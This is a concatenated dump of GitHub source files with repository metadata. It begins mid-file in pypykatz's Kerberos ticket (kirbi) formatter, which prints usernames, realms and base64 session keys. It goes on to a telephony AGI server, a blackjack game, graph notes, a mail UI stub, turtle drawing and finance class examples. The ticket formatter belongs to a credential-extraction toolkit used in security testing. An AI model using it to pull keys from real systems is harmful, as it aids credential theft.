%s\\r\\n' % username\n\t\tt += 'UserRealm : %s\\r\\n' % cred.get('prealm')\n\t\tt += 'StartTime : %s\\r\\n' % cred.get('starttime')\n\t\tt += 'EndTime : %s\\r\\n' % cred.get('endtime')\n\t\tt += 'RenewTill : %s\\r\\n' % cred.get('renew-till')\n\t\tt += 'Flags : %s\\r\\n' % flags\n\t\tt += 'Keytype : %s\\r\\n' % cred['key']['keytype']\n\t\tt += 'Key : %s\\r\\n' % base64.b64encode(cred['key']['keyvalue']).decode()\n\n\tt += 'EncodedKirbi : \\r\\n\\r\\n'\n\tt += format_kirbi(KRB_CRED(kirbi).dump())\n\treturn t\n\ndef print_kirbi(data):\n\tprint(describe_kirbi_data(data))\n\n\n\ndef parse_kirbi(kirbifile):\n\twith open(kirbifile, 'rb') as f:\n\t\tprint_kirbi(f.read())","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/kerberos/kirbiutils.py","file_name":"kirbiutils.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"12407806618","text":"from __future__ import annotations\n\nimport signal\nimport logging\nimport socketserver\nimport time\nfrom contextlib import contextmanager\nfrom types import FrameType\n\nfrom typing import Callable, Any\n\nimport psycopg2\nfrom psycopg2.extras import DictCursor\nfrom sqlalchemy.engine.url import make_url\n\nfrom xivo import agitb\nfrom xivo import moresynchro\nfrom xivo_dao.helpers.db_utils import session_scope\n\nfrom wazo_agid.fastagi import FastAGI, FastAGIDialPlanBreak\n\nlogger = logging.getLogger(__name__)\n\nSetupFunction = Callable[[DictCursor], None]\nHandleFunction = Callable[[FastAGI, DictCursor, list], None]\n\nCONNECTION_TIMEOUT = 60\n\n_server: AGID = None # type: ignore[assignment]\n_handlers: dict[str, Handler] = {}\n\n\ndef info_from_db_uri(db_uri: str) -> dict[str, str | int]:\n parsed_url = make_url(db_uri)\n exceptions = {'database': 'dbname', 'username': 'user'}\n return {\n exceptions.get(name, name): value\n for name, value in parsed_url.translate_connect_args().items()\n }\n\n\nclass Database:\n def __init__(self, db_uri: str):\n self.connection_info = info_from_db_uri(db_uri)\n\n @contextmanager\n def connection(self):\n with psycopg2.connect(**self.connection_info) as connection:\n yield connection\n\n @contextmanager\n def transaction(self, connection: psycopg2.connection) -> DictCursor:\n try:\n with connection.cursor(cursor_factory=DictCursor) as cursor:\n yield cursor\n connection.commit()\n except psycopg2.DatabaseError:\n logger.debug(\"Database error encountered. 
Rolling back.\")\n connection.rollback()\n raise\n\n\nclass FastAGIRequestHandler(socketserver.StreamRequestHandler):\n config: dict[str, Any]\n\n def handle(self):\n try:\n logger.debug(\"handling request\")\n\n fagi = FastAGI(self.rfile, self.wfile, self.config)\n except_hook = agitb.Hook(agi=fagi)\n\n handler_name = fagi.env['agi_network_script']\n logger.debug(\"delegating request handling %r\", handler_name)\n with _server.database.connection() as conn:\n with _server.database.transaction(conn) as cursor:\n _handlers[handler_name].handle(fagi, cursor, fagi.args)\n\n fagi.verbose(f'AGI handler {handler_name!r} successfully executed')\n logger.debug(\"request successfully handled\")\n\n # Attempt to relay errors to Asterisk, but if it fails, we\n # just give up.\n # XXX It may be here that dropped database connection\n # exceptions could be caught.\n except FastAGIDialPlanBreak as message:\n logger.info(\"invalid request, dial plan broken\")\n\n try:\n fagi.verbose(message)\n # TODO: see under\n fagi.appexec('Goto', 'agi_fail,s,1')\n fagi.fail()\n except Exception:\n pass\n except Exception:\n logger.exception(\"unexpected exception\")\n try:\n except_hook.handle()\n # TODO: (important!)\n # - rename agi_fail, or find a better way\n # - move at the beginning of a safe block\n fagi.appexec('Goto', 'agi_fail,s,1')\n fagi.fail()\n except Exception:\n pass\n\n\nclass AGID(socketserver.ThreadingTCPServer):\n allow_reuse_address = True\n initialized = False\n request_queue_size = 20\n # Use Daemon threads to avoid memory leak in Python 3.7.\n # The ThreadingMixin in Python 3.7 sets daemon_threads to false, but block_on_close to True\n # and this causes a reference to accumulate over time and fills the memory.\n # Using daemon threads avoids this problem, and they will be killed along with the main\n # process if killed. This did not exist in Python 2.7. For reference:\n # https://salsa.debian.org/debian/python-prometheus-client/-/commit/5aa256d8aab3b81604b855dc03f260342fc391fb\n # Should be patched in later versions of Python so re-check after the upgrade to Bullseye\n daemon_threads = True\n\n def __init__(self, config: dict[str, Any]) -> None:\n logger.info('wazo-agid starting...')\n\n self.config = config\n signal.signal(signal.SIGHUP, sighup_handle)\n\n self.database = Database(self.config[\"db_uri\"])\n self.setup()\n\n FastAGIRequestHandler.config = config\n socketserver.ThreadingTCPServer.__init__(\n self, (self.listen_addr, self.listen_port), FastAGIRequestHandler\n )\n\n self.initialized = True\n\n def setup(self) -> None:\n if not self.initialized:\n self.listen_addr = self.config[\"listen_address\"]\n logger.debug(\"listen_addr: %s\", self.listen_addr)\n\n self.listen_port = int(self.config[\"listen_port\"])\n logger.debug(\"listen_port: %d\", self.listen_port)\n\n for i in range(1, CONNECTION_TIMEOUT + 1):\n try:\n with self.database.connection():\n pass\n break\n except psycopg2.OperationalError:\n if i < CONNECTION_TIMEOUT:\n time.sleep(1)\n continue\n logger.error('Connecting to database timed out. 
Giving up.')\n raise\n\n\nclass Handler:\n def __init__(\n self,\n handler_name: str,\n setup_fn: SetupFunction | None,\n handle_fn: HandleFunction,\n ) -> None:\n self.handler_name = handler_name\n self.setup_fn = setup_fn\n self.handle_fn = handle_fn\n self.lock = moresynchro.RWLock()\n\n def setup(self, cursor: DictCursor) -> None:\n if self.setup_fn:\n self.setup_fn(cursor)\n\n def reload(self, cursor: DictCursor) -> None:\n if self.setup_fn:\n if not self.lock.acquire_write():\n logger.error(\"deadlock detected and avoided for %r\", self.handler_name)\n logger.error(\"%r has not be reloaded\", self.handler_name)\n return\n try:\n self.setup_fn(cursor)\n logger.debug('handler %r reloaded', self.handler_name)\n finally:\n self.lock.release()\n\n def handle(self, agi: FastAGI, cursor: DictCursor, args: list[str]):\n self.lock.acquire_read()\n try:\n with session_scope():\n self.handle_fn(agi, cursor, args)\n finally:\n self.lock.release()\n\n\ndef register(handle_fn: HandleFunction, setup_fn: SetupFunction | None = None) -> None:\n handler_name = handle_fn.__name__\n\n if handler_name in _handlers:\n raise ValueError(\"handler %r already registered\", handler_name)\n\n _handlers[handler_name] = Handler(handler_name, setup_fn, handle_fn)\n\n\ndef sighup_handle(signum: int, frame: FrameType | None) -> None:\n logger.debug(\"reloading core engine\")\n _server.setup()\n\n logger.debug(\"reloading handlers\")\n with _server.database.connection() as conn:\n with _server.database.transaction(conn) as cursor:\n for handler in _handlers.values():\n handler.reload(cursor)\n logger.debug(\"finished reload\")\n\n\ndef run() -> None:\n logger.debug(\"list of handlers: %s\", ', '.join(sorted(_handlers)))\n with _server.database.connection() as conn:\n with _server.database.transaction(conn) as cursor:\n for handler in _handlers.values():\n handler.setup(cursor)\n\n _server.serve_forever()\n\n\ndef init(config) -> None:\n global _server\n _server = AGID(config)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"wazo_agid/agid.py","file_name":"agid.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5344103276","text":"# master\n# master\n# BLACK JACK - CASINO A GAME OF FORTUNE!!!\nfrom time import *\n\n# BLACK JACK - CASINO\n# PYTHON CODE BASE\n\n\n# master\nimport random\n\ndeck = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10, 11] * 4\n\nrandom.shuffle(deck)\n\nprint(f'{\"*\"*58} \\n Welcome to Jeffs BlackJack \\n{\"*\"*58}')\nsleep(2)\nprint(\"So you think you have what it takes to beat my AI?\")\nsleep(2)\nprint(\"I suppose you can give it a try..\")\nsleep(2)\nprint(\"Don't beat yourself up if you lose\")\nsleep(2)\nprint(\"Loading---\")\nsleep(2)\nprint(\"It's just a game..\")\nsleep(2)\nprint(\n \"Lets give this a try \\n Dealing cards now..\"\n)\nsleep(2)\nd_cards = [] # Initializing dealer's cards\np_cards = [] # Initializing player's cards\nsleep(2)\nwhile len(d_cards) != 2:\n random.shuffle(deck)\n d_cards.append(deck.pop())\n if len(d_cards) == 2:\n print(\"The dealer has one card down and \", d_cards[1])\n\n# Displaying the Player's cards\nwhile len(p_cards) != 2:\n random.shuffle(deck)\n p_cards.append(deck.pop())\n if len(p_cards) == 2:\n print(\"The total of player is \", sum(p_cards))\n print(\"The cards Player has are \", p_cards)\n\nif sum(p_cards) > 21:\n print(f\"You are BUSTED !\\n {'*'*14}Dealer Wins !!{'*'*14}\\n\")\n exit()\n\nif sum(d_cards) > 21:\n print(f\"Dealer is BUSTED 
!\\n {'*'*14} You are the Winner !!{'*'*18}\\n\")\n exit()\n\nif sum(d_cards) == 21:\n print(f\"{'*'*24}Dealer is the Winner !!{'*'*14}\")\n exit()\n\nif sum(d_cards) == 21 and sum(p_cards) == 21:\n print(f\"{'*'*17}The match is tie !!{'*'*25}\")\n exit()\n\n\n# function to show the dealer's choice\ndef dealer_choice():\n if sum(d_cards) < 17:\n while sum(d_cards) < 17:\n random.shuffle(deck)\n d_cards.append(deck.pop())\n\n print(\"Dealer has total \" + str(sum(d_cards)) + \"with the cards \", d_cards)\n\n if sum(p_cards) == sum(d_cards):\n print(f\"{'*'*15}The match is tie !!{'*'*15}\")\n exit()\n\n if sum(d_cards) == 21:\n if sum(p_cards) < 21:\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n elif sum(p_cards) == 21:\n print(f\"{'*'*20}There is tie !!{'*'*26}\")\n else:\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n\n elif sum(d_cards) < 21:\n if sum(p_cards) < 21 and sum(p_cards) < sum(d_cards):\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n if sum(p_cards) == 21:\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n if 21 > sum(p_cards) > sum(d_cards):\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n\n else:\n if sum(p_cards) < 21:\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n elif sum(p_cards) == 21:\n print(f\"{'*'*22}Player is winner !!{'*'*22}\")\n else:\n print(f\"{'*'*23}Dealer is the Winner !!{'*'*18}\")\n\n\nwhile sum(p_cards) < 21:\n\n # to continue the game again and again !!\n k = input(\"Want to hit or stay?\\n Press 1 for hit and 0 for stay \")\n if k == 1:\n random.shuffle(deck)\n p_cards.append(deck.pop())\n print(\"You have a total of \" + str(sum(p_cards)) + \" with the cards \", p_cards)\n if sum(p_cards) > 21:\n print(f'{\"*\"*13}You are BUSTED !{\"*\"*13}\\n Dealer Wins !!')\n if sum(p_cards) == 21:\n print(f'{\"*\"*19}You are the Winner !!{\"*\"*29}')\n\n else:\n dealer_choice()\n break","repo_name":"jeffoney/PYTHON","sub_path":"blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31002536465","text":"# create dfs spannning tree\n# find articulation points\n# remove articulation points\n# how biconnected components in a graph\n\n# find dfn and low for each vertex, dfn = {}, low = {}\n# verify two biconnected comonet of a same grah have no more than 1 edge in common\n\n# what is biartite grah?\n# comletye grajhj with n vertices, show thatthe number of sanning tree is atlleast 2^n-1 - 1\n\n# proerties\n\n\n# connected_undirected_graph\n# use mocks\n\n# spanning tree of the abve graph\n\n\"\"\"\ninput =\n A\n / | \\\n B C D\n / \\ /\n E F G\n / \\ \\\n H I J\n\noutput DFS = A, B, E, F ,H, I, C, D, G, J\noutput BFS = A, B, C, D, E , F, G, H, I, J\n\nexercise : find where to BFS\n\"\"\"\n\n\nclass Vertex(object):\n def __init__(self, name):\n self.children = []\n self.name = name\n\n def addChild(self, name):\n self.children.append(Vertex(name))\n return self\n\n\nA = Vertex(\"A\")\nB = Vertex(\"B\")\nC = Vertex(\"C\")\nD = Vertex(\"D\")\nE = Vertex(\"E\")\nF = Vertex(\"F\")\nG = Vertex(\"G\")\nH = Vertex(\"H\")\nI = Vertex(\"I\")\nJ = Vertex(\"J\")\n\nA.addChild(\"B\")\nA.addChild(\"C\")\nA.addChild(\"D\")\n\n# B\nA.children[0].addChild(\"E\")\nA.children[0].addChild(\"F\")\n\n# D\nA.children[2].addChild(\"G\")\n\n# F\nA.children[0].children[1].addChild(\"H\")\nA.children[0].children[1].addChild(\"I\")\n\n# G\nA.children[2].children[0].addChild(\"J\")\n\n\ndef dfs_recursive(root, 
arr=[]):\n # print(\"node,\", root.name)\n arr.append(root.name)\n for child in root.children:\n dfs_recursive(child, arr=arr)\n return arr\n\n\ndef bfs(root, arr=[]):\n childs = root.children\n arr.append(root.name)\n while childs:\n next_ = childs.pop(0)\n arr.append(next_.name)\n if next_.children:\n childs.extend(next_.children)\n return arr\n\n\ndef bfs_recursive(root, arr=[], childs=[]):\n arr.append(root.name)\n if root.children:\n childs.extend(root.children)\n if childs:\n bfs_recursive(childs.pop(0), arr, childs)\n return arr\n\n\n\"\"\"\nvertex - n \ne - n-1\n \ninput graph = \n\n 0\n / | \n 1 ---- 2 \n / | |\n3 - 4 ----- \n\noutput DFS = 0, 1, 3, 4, 2\noutput BFS = 0, 1, 3,4\n\"\"\"\n\n#\n# graph = {'0': set(['1', '2']),\n# '1': set(['0', '3', '4']),\n# '2': set(['0']),\n# '3': set(['1']),\n# '4': set(['2', '3'])}\n\ngraph = {'0': ['1', '2'],\n '1': ['0', '3', '4'],\n '2': ['0'],\n '3': ['1'],\n '4': ['2', '3']}\n\nvisited = {str(i): False for i in range(5)}\n\n\n# DFS algorithm\ndef dfs_connected_undirected(start):\n print(start)\n visited[start] = True\n for next in graph[start]:\n if not visited[next]:\n dfs_connected_undirected(next)\n return visited\n\n\n# \"\"\"\n# input graph =\n# 0 (1 - 1)\n# / |\n# (2 - ) 1 ---- 2 (5)\n# / | |\n# (3 - ) 3 - 4 ----\n# (4 - )\n# output =\n#\n# \"\"\"\n\nvisited = {str(i): False for i in range(5)}\ndfn = {str(i): -1 for i in range(5)}\nlow = {str(i): -1 for i in range(5)}\n\n\ndef dfn_and_low(start, parent, idx=-1):\n \"\"\"\n dfn[i] just num++\n low = min\n \"\"\"\n print(start)\n visited[start] = True\n\n dfn[start] = idx + 1\n low[start] = idx + 1\n\n for next in graph[start]:\n if not visited[next]:\n dfn_and_low(next, start, idx + 1)\n low[start] = min(low[start], low[next])\n else:\n if next != parent:\n low[start] = min(low[start], dfn[next])\n\n\nif __name__ == '__main__':\n # theory\n # nolinear DS\n # A Graph is a non-linear data structure consisting of nodes and edges. The nodes are sometimes also referred to as vertices and the edges are lines or arcs that connect any two nodes in the graph. More formally a Graph can be defined as,\n # runtimes\n # time ->O(v+e)\n # space -> O(e) # explain how\n\n # arr = dfs_recursive(A)\n # print(arr)\n # arr = bfs_recursive(A)\n # print(arr)\n # arr = bfs(A)\n # print(arr)\n # **********************#\n\n # dfs_connected_undirected('0')\n # ***\n\n dfn_and_low('0', '-1')\n print(dfn)\n print(low)\n\n#\n# Why this class - value added purpose for this group\n# I have started this and I don't want waste your time and go empty handed\n#\n# Take aways\n# Basic idea on graph\n# whats next?\n# references and relevant graph problems to practice\n\n# process and plan to prepare for the interview on FANG(experimental and not proved)\n\n# Why are processes important? 
They are important because they describe\n# how things are done and provide the focus for making them better,\n# and how they are done determines how successful the outcomes will be.\n# If you focus on the right processes, in the right way, you can design your way to success.\n\n#\n\n\n# Discussing ideas, if any\n# polls in slack\n# 30 | 30\n# check the problems sheet\n","repo_name":"Siva-Karthi/ProblemSolvingPractice","sub_path":"Interviews/Amazon/graphs_rough.py","file_name":"graphs_rough.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"40834556404","text":"import pathlib\nimport pygubu\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nPROJECT_PATH = pathlib.Path(__file__).parent\nPROJECT_UI = PROJECT_PATH / \"send_mail.ui\"\n\n\nclass SendMail:\n    def __init__(self, master=None):\n        # build ui\n        self.main_frame = tk.Frame(master)\n        self.blue_frame = tk.Frame(self.main_frame)\n        self.mai_image_send = tk.Label(self.blue_frame)\n        self.img_mail_send = tk.PhotoImage(file='/home/garuda/Desktop/project/message_manage/assets/images/mail_send.png')\n        self.mai_image_send.configure(image=self.img_mail_send, text='label1')\n        self.mai_image_send.place(anchor='nw', relx='0.08', rely='0.35', x='0', y='0')\n        self.sm_label_send = ttk.Label(self.blue_frame)\n        self.sm_label_send.configure(background='#10e396', font='{avro} 14 {bold italic}', text='Send Mail')\n        self.sm_label_send.place(anchor='nw', relx='0.25', rely='0.15', x='0', y='0')\n        self.blue_frame.configure(background='#10e396', height='500', width='300')\n        self.blue_frame.place(anchor='nw', x='0', y='0')\n        self.mail_sub_label_send = ttk.Label(self.main_frame)\n        self.mail_sub_label_send.configure(background='#cafae6', font='{avro} 12 {italic}', text='Mail Subject')\n        self.mail_sub_label_send.place(anchor='nw', relx='0.4', rely='0.15', x='0', y='0')\n        self.subject_entry_send = ttk.Entry(self.main_frame)\n        self.subject_entry_send.configure(font='{avro} 12 {italic}')\n        self.subject_entry_send.place(anchor='nw', relx='0.6', rely='0.15', x='0', y='0')\n        self.body_label_send = tk.Label(self.main_frame)\n        self.body_label_send.configure(background='#cafae6', font='{avro} 12 {italic}', text='Mail Body')\n        self.body_label_send.place(anchor='nw', relx='0.4', rely='0.25', x='0', y='0')\n        self.body_text_send = tk.Text(self.main_frame)\n        self.body_text_send.configure(height='10', width='50')\n        self.body_text_send.place(anchor='nw', relx='0.4', rely='0.3', width='365', x='0', y='0')\n        self.list_erp_label_send = tk.Label(self.main_frame)\n        self.list_erp_label_send.configure(background='#cafae6', font='{avro} 12 {italic}', text='List of ERP')\n        self.list_erp_label_send.place(anchor='nw', relx='0.4', rely='0.65', x='0', y='0')\n        self.seperate_label_send = tk.Label(self.main_frame)\n        self.seperate_label_send.configure(background='#cafae6', text='(separated by , )')\n        self.seperate_label_send.place(anchor='nw', relx='0.51', rely='0.65', x='0', y='0')\n        self.erp_text_send = tk.Text(self.main_frame)\n        self.erp_text_send.configure(height='10', width='50')\n        self.erp_text_send.place(anchor='nw', height='75', relx='0.4', rely='0.7', width='365', x='0', y='0')\n        self.all_checkbutton_send = tk.Checkbutton(self.main_frame)\n        self.all_checkbutton_send.configure(background='#cafae6', font='{avro} 12 {}', text=' All')\n        self.all_checkbutton_send.place(anchor='nw', relx='0.4', rely='0.85', x='0', y='0')\n        self.all_checkbutton_send.configure(command=self.all_mail)\n        self.cm_label_send = tk.Label(self.main_frame)\n        self.cm_label_send.configure(background='#cafae6', font='{avro} 14 {bold italic}', text='Compose Mail')\n        self.cm_label_send.place(anchor='nw', relx='0.4', rely='0.04', x='0', y='0')\n        self.send_send = tk.Button(self.main_frame)\n        self.img_send = tk.PhotoImage(file='/home/garuda/Desktop/project/message_manage/assets/images/send.png')\n        self.send_send.configure(activebackground='#cafae6', background='#cafae6', borderwidth='0', highlightthickness='0')\n        self.send_send.configure(image=self.img_send, text='button3')\n        self.send_send.place(anchor='nw', relx='0.86', rely='0.9', x='0', y='0')\n        self.send_send.configure(command=self.send_mail)\n        self.main_frame.configure(background='#cafae6', borderwidth='0', height='500', highlightbackground='#cafae6')\n        self.main_frame.configure(highlightcolor='#cafae6', highlightthickness='0', width='800')\n        self.main_frame.pack(expand='false', side='top')\n        self.main_frame.pack_propagate(0)\n\n        # Main widget\n        self.mainwindow = self.main_frame\n\n    def run(self):\n        self.mainwindow.mainloop()\n\n    def all_mail(self):\n        pass\n\n    def send_mail(self):\n        pass\n\n\nif __name__ == '__main__':\n    root = tk.Tk()\n    root.title('Send Mail')\n    root.resizable(height=False,width=False)\n    app = SendMail(root)\n    app.run()\n\n","repo_name":"lokie861/Message-Management-System","sub_path":"modules/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"28502735603","text":"from turtle import *\nspeed(0)  # fastest possible drawing\nbgcolor(\"black\")\nhideturtle()\n# FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS-FUNCTIONS\ndef go_to(x, y):\n    \"\"\"\n    The turtle lifts the pen,\n    moves to the coordinates x, y,\n    and lowers the pen.\n    \"\"\"\n    penup()\n    goto(x, y)\n    pendown()\n\ndef rectangle(w, h):\n    \"\"\"\n    draws a rectangle of width w and height h\n    \"\"\"\n\n    forward(w)\n    right(90)\n    forward(h)\n    right(90)\n    forward(w)\n    right(90)\n    forward(h)\n    right(90)\n\ndef filled_rectangle(w, h, fill_color):\n    \"\"\"\n    draws a rectangle of width w and height h,\n    filled with the color fill_color\n    \"\"\"\n    fillcolor(fill_color);\n    begin_fill()\n    rectangle(w, h)\n    end_fill()\n\ndef square(a):\n    \"\"\"\n    draws a square with side a\n    \"\"\"\n    rectangle(a, a)\n\ndef fill_square(a, color):\n    \"\"\"\n    draws a square with side a and fill color color\n    \"\"\"\n    fillcolor(color);\n    begin_fill()\n    square(a)\n    end_fill()\n\n# END FUNCTIONS-END FUNCTIONS-END FUNCTIONS-END FUNCTIONS-END FUNCTIONS\n\ngo_to(-300, -200)\n\n# DRAW THE SQUARES\npensize(3)\npencolor(\"yellow\")\nfill_square(100, \"#250379\")\ngo_to(-180, -100)\npencolor(\"#aaffff\")\nfill_square(200, \"#affa00\")\ngo_to(40, 0)\npencolor(\"yellow\")\nfill_square(300, \"#5050ff\")\n\ngo_to(-300, 200)\npencolor(\"red\")\nfilled_rectangle(640, 180, \"#00ff00\")\n\ngo_to(-300, 0)\npencolor('purple')\nrectangle(320, 80)\n\ngo_to(-300, -100)\npencolor('#0000ff')\nrectangle(100, 80)\nheading(\"false\")\n","repo_name":"slutsk/turtle","sub_path":"pr002.py","file_name":"pr002.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12453813622","text":"# -*- coding:utf-8 -*-\n# Author: Lu Liwen\n# Modified Time: 2019-12-08\n\n\"\"\"\nRead operations for fixed-format csv files\n\n\"\"\"\nimport csv\nimport numpy as np\n\n\n# Read fixed-format csv sample data\ndef csvRead(usage, type):\n    \"\"\"\n\n    :param usage: train or test\n    :param type: label or name\n    :return:\n    \"\"\"\n    data = []\n    path = './result/data/' + str(usage) + 'file' + '_' + str(type) + '.csv'\n    f = open(path, 'r')\n    csv_reader = csv.reader(f)\n    for line in csv_reader:\n        if type == 'label':\n            data.append(line)\n        elif type == 'name':\n            data.append(line[1])\n    return data\n\n\ndef str2float(datastr):\n    m, n = np.shape(datastr)\n    datafloat = np.zeros((m, n))\n    for i in range(m):\n        for j in range(n):\n            try:\n                datafloat[i][j] = float(datastr[i][j].rstrip())  # convert by traversing the array\n            except:\n                print('Zero entry at row %d, column %d' % (i + 1, j + 1))\n                datafloat[i][j] = 0.0\n\n    return datafloat\n","repo_name":"hellollw/Tensorflow_Texture_Detect","sub_path":"CNN之前版本代码结构参考/CsvFunction.py","file_name":"CsvFunction.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31313817947","text":"import sys, pdb\nsys.path.append('/usr/share/doc')\nsys.path.append(\"/usr/lib/python3/dist-packages\")\nsys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\nimport matplotlib as mpl\nmpl.use('Agg')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\nimport matplotlib as mpl\nmpl.rcParams['font.family'] = 'serif'\nimport traits.api as trapi\nimport traitsui.api as trui\n\nPATH = '/home/ubuntu/workspace/python_for_finance/png/book_examples/ch13/'\n\ndef multiplication(self):\n    return self.a * self.b\n\nclass sorted_list(object):\n    def __init__(self, elements):\n        self.elements = sorted(elements)  # sorted list object\n    def __iter__(self):\n        self.position = -1\n        return self\n    def __next__(self):\n        if self.position == len(self.elements) - 1:\n            raise StopIteration\n        self.position += 1\n        return self.elements[self.position]\n\nclass ExampleOne(object):\n    pass\n\nclass ExampleTwo(object):\n    def __init__(self, a, b):\n        self.a = a\n        self.b = b\n\nclass ExampleThree(object):\n    def __init__(self, a, b):\n        self.a = a\n        self.b = b\n    def addition(self):\n        return self.a + self.b\n\nclass ExampleFour(ExampleTwo):\n    def addition(self):\n        return self.a + self.b\n\nclass ExampleFive(ExampleFour):\n    def multiplication(self):\n        return self.a * self.b\n\nclass ExampleSix(ExampleFour):\n    multiplication = multiplication\n\nclass ExampleSeven(object):\n    def __init__(self, a, b):\n        self.a = a\n        self.b = b\n        self.__sum = a + b\n    multiplication = multiplication\n    def addition(self):\n        return self.__sum\n\ndef object_orientation():\n    c = ExampleOne()\n    print(c.__str__())\n    print(type(c))\n\n    c = ExampleTwo(1, 'text')\n    print(c.a)\n    print(c.b)\n    c.a = 100\n    print(c.a)\n    c = ExampleOne()\n    c.first_name = 'Jason'\n    c.last_name = 'Bourne'\n    c.movies = 4\n    print(c.first_name, c.last_name, c.movies)\n\n    c = ExampleThree(10, 15)\n    print(c.addition())\n    c.a += 10\n    print(c.addition())\n\n    c = ExampleFour(10, 15)\n    print(c.addition())\n\n    c = ExampleFive(10, 15)\n    print(c.addition())\n    print(c.multiplication())\n\n    c = ExampleSix(10, 15)\n    print(c.addition())\n    print(c.multiplication())\n\n    c = ExampleSeven(10, 15)\n    print(c.addition())\n    print(c._ExampleSeven__sum)\n    c.a += 10\n    print(c.a)\n    print(c.addition())\n    print(c._ExampleSeven__sum)\n    print(c.multiplication())\n    name_list = ['Sandra', 'Lilli', 'Guido', 'Zorro', 'Henry']\n    for name in name_list:\n        print(name)\n\n    sorted_name_list = sorted_list(name_list)\n    for name in sorted_name_list:\n        print(name)\n\n    print(type(sorted(name_list)))\n    for 
name in sorted(name_list):\n print(name)\n\n print(type(sorted_name_list))\n \ndef discount_factor(r, t):\n ''' Function to calculate a discount factor.\n \n Parameters\n ==========\n r : float\n positive, constant short rate\n t : float, array of floats\n future date(s), in fraction of years;\n e.g. 0.5 means half a year from now\n \n Returns\n =======\n df : float\n discount factor\n '''\n df = np.exp(-r * t)\n # use of NumPy universal function for vectorization\n return df\n \nclass short_rate(object):\n ''' Class to model a constant short rate object.\n \n Parameters\n ==========\n name : string\n name of the object\n rate : float\n positive, constant short rate\n \n Methods\n =======\n get_discount_factors :\n returns discount factors for given list/array\n of dates/times (as year fractions)\n '''\n def __init__(self, name, rate):\n self.name = name\n self.rate = rate\n def get_discount_factors(self, time_list):\n ''' time_list : list/array-like '''\n time_list = np.array(time_list)\n return np.exp(-self.rate * time_list)\n \nclass cash_flow_series(object):\n ''' Class to model a cash flows series.\n \n Attributes\n ==========\n name : string\n name of the object\n time_list : list/array-like\n list of (positive) year fractions\n cash_flows : list/array-like\n corresponding list of cash flow values\n short_rate : instance of short_rate class\n short rate object used for discounting\n \n Methods\n =======\n present_value_list :\n returns an array with present values\n net_present_value :\n returns NPV for cash flow series\n '''\n def __init__(self, name, time_list, cash_flows, short_rate):\n self.name = name\n self.time_list = time_list\n self.cash_flows = cash_flows\n self.short_rate = short_rate\n def present_value_list(self):\n df = self.short_rate.get_discount_factors(self.time_list)\n return np.array(self.cash_flows) * df\n def net_present_value(self):\n return np.sum(self.present_value_list())\n\nclass cfs_sensitivity(cash_flow_series):\n def npv_sensitivity(self, short_rates):\n npvs = []\n for rate in short_rates:\n self.short_rate = short_rate('r', rate)\n npvs.append(self.net_present_value())\n return np.array(npvs)\n\ndef short_rate_class():\n t = np.linspace(0, 5)\n for r in [0.01, 0.05, 0.1]:\n plt.plot(t, discount_factor(r, t), label='r=%4.2f' % r, lw=1.5)\n plt.xlabel('years')\n plt.ylabel('discount factor')\n plt.grid(True)\n plt.legend(loc=0)\n plt.savefig(PATH + 'short_rate.png', dpi=300)\n plt.close()\n \n sr = short_rate('r', 0.05)\n print(sr.name, sr.rate)\n \n time_list = [0.0, 0.5, 1.0, 1.25, 1.75, 2.0] # in year fractions\n print(sr.get_discount_factors(time_list))\n \n for r in [0.025, 0.05, 0.1, 0.15]:\n sr.rate = r\n plt.plot(t, sr.get_discount_factors(t),\n label='r=%4.2f' % sr.rate, lw=1.5)\n plt.xlabel('years')\n plt.ylabel('discount factor')\n plt.grid(True)\n plt.legend(loc=0)\n plt.savefig(PATH + 'short_rate2.png', dpi=300)\n plt.close()\n\n sr.rate = 0.05\n cash_flows = np.array([-100, 50, 75])\n time_list = [0.0, 1.0, 2.0]\n disc_facts = sr.get_discount_factors(time_list)\n print(disc_facts)\n print(disc_facts * cash_flows)\n print(np.sum(disc_facts * cash_flows))\n sr.rate = 0.15\n print(np.sum(sr.get_discount_factors(time_list) * cash_flows))\n\n sr.rate = 0.05\n cfs = cash_flow_series('cfs', time_list, cash_flows, sr)\n print(cfs.cash_flows)\n print(cfs.time_list)\n print(cfs.present_value_list())\n print(cfs.net_present_value())\n\n pdb.set_trace()\n cfs_sens = cfs_sensitivity('cfs', time_list, cash_flows, sr)\n short_rates = [0.01, 0.025, 0.05, 
